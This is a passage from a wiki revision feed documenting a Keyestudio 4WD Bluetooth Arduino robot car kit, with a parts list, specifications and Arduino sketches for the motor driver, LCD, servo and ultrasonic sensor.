    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Bottom PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Plastic Platform&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;IR Remote Control&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Toggle Switch + Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;18650 Battery Holder&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;DC Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Motor Fixed Part&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Plastic Tire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 40MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 10MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;USB Cable&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Jumper Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;30&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*6MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;60&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*8MM Flat Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*30MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3MM Nut&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Black)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Red)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Winding Wire (12CM)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Assembly ==&lt;br /&gt;
&lt;br /&gt;
Follow the User Manual. If something is unclear then watch a assembly video. Be careful when installing the motors, make sure they’re all properly aligned, if not the car will pull to one side.&lt;br /&gt;
Especially take care that no cables sticks into the motors.&lt;br /&gt;
&lt;br /&gt;
== Motor control ==&lt;br /&gt;
We control the motor using a H-Bridge L298N Motor Driver. Use a exxternal 5V logic supply when using more than 12V driving voltage.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver.png|500px]]&lt;br /&gt;
&lt;br /&gt;
In our case we need to plug two motors to each motorA and motorB. Connect the power from the battery pack VSS and GND.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver_schematics.png|500px]]&lt;br /&gt;
&lt;br /&gt;
Wire the motor to the Arduino/Sensor Shield as adviced in the user manual.&lt;br /&gt;
&lt;br /&gt;
=== Specification: ===&lt;br /&gt;
* Working Mode: H bridge (double lines)&lt;br /&gt;
* Control Chip: L298N (ST)&lt;br /&gt;
* Logical Voltage: 5V&lt;br /&gt;
* Driving Voltage: 5V-35V&lt;br /&gt;
* Logical Current: 0mA-36mA&amp;gt;&lt;br /&gt;
* Driving Current: 2A (MAX single bridge)&lt;br /&gt;
* Storage Temperature: (-20 °C)-(+135 °C)&lt;br /&gt;
* Maximum Power: 25W&lt;br /&gt;
* Weight: 30g&lt;br /&gt;
* Periphery Dimension: 43 x 43 x 27 mm(L x W x H)&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
==== Initiation ====&lt;br /&gt;
 //define the output pins.&lt;br /&gt;
 int IN1=5;&lt;br /&gt;
 int IN2=6;&lt;br /&gt;
 int IN3=7;&lt;br /&gt;
 int IN4=8;&lt;br /&gt;
 int ENA=9;&lt;br /&gt;
 int ENB=10;&lt;br /&gt;
 void setup() {&lt;br /&gt;
   //set up the pins to act as output.&lt;br /&gt;
   for (int i = 5; i &amp;lt; 11;i++)&lt;br /&gt;
   {&lt;br /&gt;
     pinMode(i,OUTPUT);&lt;br /&gt;
   }&lt;br /&gt;
   delay(5000);&lt;br /&gt;
 }&lt;br /&gt;
==== Rotate Clockwise ====  &lt;br /&gt;
&lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Rotate Clockwise ==== &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Forward ====&lt;br /&gt;
&lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Reverse ====&lt;br /&gt;
&lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
  &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Brake ====&lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== I2C Display ==&lt;br /&gt;
The display is controlled with I2C. I am using the Wire and LiquidCrystal_I2C library to control the display.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
&lt;br /&gt;
* I2C Address: 0x27&lt;br /&gt;
* Back Lit (Blue with white char color)&lt;br /&gt;
* Supply Voltage: 5V&lt;br /&gt;
* Interface:I2C/TWI x1,Gadgeteer interface x2&lt;br /&gt;
* Adjustable Contrast&lt;br /&gt;
* Size:82x35x18 mm&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:I2C_Display_Schematics.png|800px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&amp;lt;div style=&amp;quot;border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Note&amp;lt;/b&amp;gt;: Don&#039;t use the library link that is in the manual, it contains a bug where only the first character of the strings is displayed on the I2C display. Download the latest version from https://www.arduinolibraries.info/libraries/liquid-crystal-i2-c.&lt;br /&gt;
&amp;lt;/div&amp;gt; &lt;br /&gt;
 #include &amp;lt;Wire.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;LiquidCrystal_I2C.h&amp;gt;&lt;br /&gt;
 //set the LCD address to 0x27 for a 16 chars and 2 line display&lt;br /&gt;
 LiquidCrystal_I2C lcd(0x27,16,2);&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
  //initialize the lcd&lt;br /&gt;
  lcd.init();&lt;br /&gt;
  //enable the backlight &lt;br /&gt;
  lcd.backlight();&lt;br /&gt;
  //set the cursor to the first line.&lt;br /&gt;
  lcd.setCursor(3,0);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;Hello&amp;quot;);&lt;br /&gt;
  //set the cursor in the next line.&lt;br /&gt;
  lcd.setCursor(3,1);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;world!&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop()&lt;br /&gt;
 {}&lt;br /&gt;
&lt;br /&gt;
== Servo Motor ==&lt;br /&gt;
The Servo Motor is controlled with PWM. The Sketch rotates the motor in an angle between 110 and 180 degres.&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Servo_Motor_Schematics.png|400px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 int servopin=2;// select digital pin 9 for servomotor signal line&lt;br /&gt;
 int myangle;// initialize angle variable&lt;br /&gt;
 int pulsewidth;// initialize width variable&lt;br /&gt;
 int val;&lt;br /&gt;
 &lt;br /&gt;
 void servopulse(int servopin,int myangle)// define a servo pulse function&lt;br /&gt;
 {&lt;br /&gt;
   pulsewidth=(myangle*11)+500;// convert angle to 500-2480 pulse width&lt;br /&gt;
   digitalWrite(servopin,HIGH);// set the level of servo pin as “high”&lt;br /&gt;
   delayMicroseconds(pulsewidth);// delay microsecond of pulse width&lt;br /&gt;
   digitalWrite(servopin,LOW);// set the level of servo pin as “low”&lt;br /&gt;
   delay(20-pulsewidth/1000);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
   pinMode(servopin,OUTPUT);// set servo pin as “output”&lt;br /&gt;
   Serial.begin(9600);// connect to serial port, set baud rate at “9600”&lt;br /&gt;
   Serial.println(&amp;quot;ready&amp;quot; ) ;&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop(){&lt;br /&gt;
   val = 180;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
   val = 110;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Ultra Sonic Sensor ==&lt;br /&gt;
I used the pins: echoPin 3 and trigPin 4 because 7 and 8 is already taken by the motordriver.&lt;br /&gt;
If you don&#039;t understand the line: distance = duration/58.3;.&lt;br /&gt;
The speed of sound is 343 m/s. We messure the round trip so we need to divide the 343 with 2 which gives us 171.5 m/s. But we don’t want to deal with meters and seconds we want centimeters and microseconds. 17150 cm/s = 0.017150 cm/us = 1cm/58.3 us.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Working Voltage: DC 5V&lt;br /&gt;
* Working Current: 15mA&lt;br /&gt;
* Working Frequency: 40Hz&lt;br /&gt;
* Max Range: 4m&lt;br /&gt;
* Min Range: 2cm&lt;br /&gt;
* Measuring Angle: 15 degree&lt;br /&gt;
* Trigger Input Signal: 10µS TTL pulse&lt;br /&gt;
* Echo Output Signal Input TTL lever signal and the range in proportion&lt;br /&gt;
* Size: 46*20.4mm&lt;br /&gt;
* Weight: 9g&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Ultra_Sonic_Schematics.png|650px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 #define echoPin 7 // Echo Pin&lt;br /&gt;
 #define trigPin 8 // Trigger Pin&lt;br /&gt;
 #define LEDPin 13 // Onboard LED&lt;br /&gt;
 &lt;br /&gt;
 int maximumRange = 200; // Maximum range needed&lt;br /&gt;
 int minimumRange = 0; // Minimum range needed&lt;br /&gt;
 long duration, distance; // Duration used to calculate distance&lt;br /&gt;
 &lt;br /&gt;
 void setup() {&lt;br /&gt;
  Serial.begin (9600);&lt;br /&gt;
  pinMode(trigPin, OUTPUT);&lt;br /&gt;
  pinMode(echoPin, INPUT);&lt;br /&gt;
  pinMode(LEDPin, OUTPUT); // Use LED indicator (if required)&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop() {&lt;br /&gt;
 /* The following trigPin/echoPin cycle is used to determine the&lt;br /&gt;
  distance of the nearest object by bouncing soundwaves off of it. */ &lt;br /&gt;
  digitalWrite(trigPin, LOW); &lt;br /&gt;
  delayMicroseconds(2); &lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(trigPin, HIGH);&lt;br /&gt;
  delayMicroseconds(10); &lt;br /&gt;
  digitalWrite(trigPin, LOW);&lt;br /&gt;
  duration = pulseIn(echoPin, HIGH);&lt;br /&gt;
  &lt;br /&gt;
  //Calculate the distance (in cm) based on the speed of sound.&lt;br /&gt;
  distance = duration/58.3;&lt;br /&gt;
 &lt;br /&gt;
  if (distance &amp;gt;= maximumRange || distance &amp;lt;= minimumRange){&lt;br /&gt;
   /* Send a negative number to computer and Turn LED ON &lt;br /&gt;
   to indicate &amp;quot;out of range&amp;quot; */&lt;br /&gt;
   Serial.println(&amp;quot;-1&amp;quot;);&lt;br /&gt;
   digitalWrite(LEDPin, HIGH); &lt;br /&gt;
  }&lt;br /&gt;
  else {&lt;br /&gt;
   /* Send the distance to the computer using Serial protocol, and&lt;br /&gt;
   turn LED OFF to indicate successful reading. */&lt;br /&gt;
   Serial.println(distance);&lt;br /&gt;
   digitalWrite(LEDPin, LOW); &lt;br /&gt;
  } &lt;br /&gt;
  //Delay 50ms before next reading.&lt;br /&gt;
  delay(50);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Line Tracking Sensor ==&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: +5V&lt;br /&gt;
* Operating Current: &amp;lt;10mA&lt;br /&gt;
* Operating Temperature Range: 0°C ~ + 50°C&lt;br /&gt;
* Output Interface: 3-wire interface (1 - signal, 2 - power, 3 - power supply negative)&lt;br /&gt;
* Output Level: TTL level&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Line_Tracking_Sensor_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
== Digital IR Receiver Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: 5V&lt;br /&gt;
* Interface: Digital&lt;br /&gt;
* Modulate Frequency: 38kHz&lt;br /&gt;
* Module Interface Socket: JST PH2.0&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:IR_Receiver_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
== Bluetooth Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Bluetooth Protocol: Bluetooth 2.1+ EDR Standard&lt;br /&gt;
* USB Protocol: USB v1.1/2.0&lt;br /&gt;
* Operating Frequency: 2.4GHz ISM Frequency Band&lt;br /&gt;
* Modulation Mode: Gauss Frequency Shift Keying&lt;br /&gt;
* Transmit Power: ≤ 4dBm, Second Stage&lt;br /&gt;
* Sensitivity: ≤-84dBm at 0.1% Bit Error Rate&lt;br /&gt;
* Transmission Speed: 2.1Mbps(Max)/160 kbps(Asynchronous)； 1Mbps/1Mbps(Synchronous)&lt;br /&gt;
* Safety Feature: Authentication and Encryption&lt;br /&gt;
* Supported Configuration: Bluetooth Serial Port (major and minor)&lt;br /&gt;
* Supply Voltage: 5V DC 50mA &lt;br /&gt;
* Operating Temperature: -20 to 55℃&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Bluetooth_Module_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Smart Robot Car Kit Bluetooth 4WD keyestudio]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wiki.keyestudio.com/Ks0192_keyestudio_4WD_Bluetooth_Multi-functional_Car&lt;br /&gt;
* https://www.youtube.com/watch?v=GAqvzCXEUSw&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5996</id>
		<title>Keyestudio 4WD Bluetooth multifunctional car kit</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5996"/>
		<updated>2021-02-12T15:56:01Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the keyestudio 4WD Bluetooth Multi-functional Car Kit. The documentation contains schematics, tipps and code for the car. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Arduino IDE&lt;br /&gt;
* 18650 Batteries (not included in kit)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
=== Component list ===&lt;br /&gt;
&amp;lt;table style=&amp;quot;border: solid 1px black; width:50%   border-collapse: collapse; border-spacing: 0;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:30%; padding: 5px 10px; text-align: center;&amp;quot;&amp;gt;Product Name&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;Quantity&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio UNO R3&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Shield V5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio L298N Motor Shield&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Bluetooh HC-06&amp;lt;/td&amp;gt;&lt;br /&gt;
